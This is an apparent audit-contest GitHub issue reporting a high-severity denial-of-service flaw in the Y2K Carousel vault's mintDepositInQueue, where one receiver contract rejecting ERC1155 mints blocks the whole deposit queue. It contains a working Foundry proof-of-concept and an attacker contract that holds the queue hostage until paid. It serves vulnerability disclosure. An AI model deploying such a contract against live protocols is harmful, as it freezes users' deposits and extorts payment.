Skip to content
This repository has been archived by the owner on Oct 1, 2023. It is now read-only.

jprod15 - malicious user can break mintDepositInQueue making users loss fund #240

Closed
sherlock-admin opened this issue Mar 27, 2023 · 0 comments
Closed

jprod15 - malicious user can break mintDepositInQueue making users loss fund #240

sherlock-admin opened this issue Mar 27, 2023 · 0 comments
Labels
Duplicate A valid issue that is a duplicate of an issue with `Has Duplicates` label High A valid High severity issue Reward A payout will be made for this issue

Comments

@sherlock-admin
Copy link
Contributor

sherlock-admin commented Mar 27, 2023
edited by github-actions bot
Loading

jprod15

high

malicious user can break mintDepositInQueue making users loss fund

Summary

a malicious user can attack function mintDepositInQueue with a Dos making that users that deposit with id 0 loss a funds

Vulnerability Detail

https://github.com/sherlock-audit/2023-03-Y2K/blob/main/Earthquake/src/v2/Carousel/Carousel.sol#L98

https://github.com/sherlock-audit/2023-03-Y2K/blob/main/Earthquake/src/v2/Carousel/Carousel.sol#L117

https://github.com/sherlock-audit/2023-03-Y2K/blob/main/Earthquake/src/v2/Carousel/Carousel.sol#L334-L337

due that this operations is made in a cycle a malicious user can put a address of receiver that no handle erc1155 making reverted

_mintShares(
        queue[i].receiver,//@audit-issue  can be break if recevier can not mint
            _epochId,
            queue[i].assets - relayerFee
        );

therefore all transaction of mintDepositInQueue will reverte

add this function test in CarouselTest.t.sol

     function test_exploit_Dos_DepositIntoQueueMultiple() public {
            // test multiple deposits into queue
            uint40 _epochBegin = uint40(block.timestamp + 1 days);
            uint40 _epochEnd = uint40(block.timestamp + 2 days);
            uint256 _epochId = 2;
            uint256 _emissions = 100 ether;

            deal(emissionsToken, address(vault), 100 ether, true);
            vault.setEpoch(_epochBegin, _epochEnd, _epochId);
            vault.setEmissions( _epochId, _emissions);



            helperDepositInEpochs(_epochId,USER, true);
            helperDepositInEpochs(_epochId,USER2, true);
            helperDepositInEpochs(_epochId,USER3, true);

            Dos  Dos_contract =  new Dos(ATTACKER);//@audit-info  attacker deploy contract Dos

            vm.startPrank(ATTACKER); 
            IERC20(UNDERLYING).approve(address(vault), relayerFee);
            vault.deposit(0, relayerFee, address(Dos_contract));//@audit-info atacker call deposit with minimun amount  require
            vm.stopPrank();


            helperDepositInEpochs(_epochId,USER4, true);
            helperDepositInEpochs(_epochId,USER5, true);
            helperDepositInEpochs(_epochId,USER6, true);

            assertEq(vault.getDepositQueueLenght(),7);
            
    
            vm.expectRevert();
            // mint deposit in queue
            vault.mintDepositInQueue(_epochId, 7);//@audit-info revert

            deal(address(Dos_contract),11 ether);//@audit-info pay 10 ether to attacker

            assertEq(vault.getDepositQueueLenght(),7);
            
            vault.mintDepositInQueue(_epochId, 7);//@audit-info success

        
        }

this contracts is part of test

    contract Dos {

        address owner;


        constructor(address _owner){
            owner=_owner;

        }


        function onERC1155Received(address operator,address from, uint256 id,uint256  amount,  bytes memory data)external returns (bytes4 response)
        {
            if(address(this).balance > 10 ether)
            {
            return IERC1155Receiver.onERC1155Received.selector;
            }

        }

            fallback() external 
            {

            }

            function trasferToOwner() public
            {
                require(owner==msg.sender,"");
                (bool success,)=owner.call{value:address(this).balance}("");
                require(success);
            }
        
    }

run
forge test -m test_exploit_Dos_DepositIntoQueueMultiple -vv
the result

  Running 1 test for test/V2/Carousel/CarouselTest.t.sol:CarouselTest
  [PASS] test_exploit_Dos_DepositIntoQueueMultiple() (gas: 1527471)
  Test result: ok. 1 passed; 0 failed; finished in 24.15ms

Impact

user loss fund

Code Snippet

https://github.com/sherlock-audit/2023-03-Y2K/blob/main/Earthquake/src/v2/Carousel/Carousel.sol#L98

https://github.com/sherlock-audit/2023-03-Y2K/blob/main/Earthquake/src/v2/Carousel/Carousel.sol#L117

https://github.com/sherlock-audit/2023-03-Y2K/blob/main/Earthquake/src/v2/Carousel/Carousel.sol#L334-L337

Tool used

Manual Review

Recommendation

could check at moment of deposit if receiver can handle erc 1555

Duplicate of #468
@github-actions github-actions bot closed this as completed Apr 3, 2023
@github-actions github-actions bot added High A valid High severity issue Duplicate A valid issue that is a duplicate of an issue with `Has Duplicates` label labels Apr 3, 2023
@sherlock-admin sherlock-admin added the Reward A payout will be made for this issue label Apr 11, 2023
Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Assignees
No one assigned
Labels
Duplicate A valid issue that is a duplicate of an issue with `Has Duplicates` label High A valid High severity issue Reward A payout will be made for this issue
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@sherlock-admin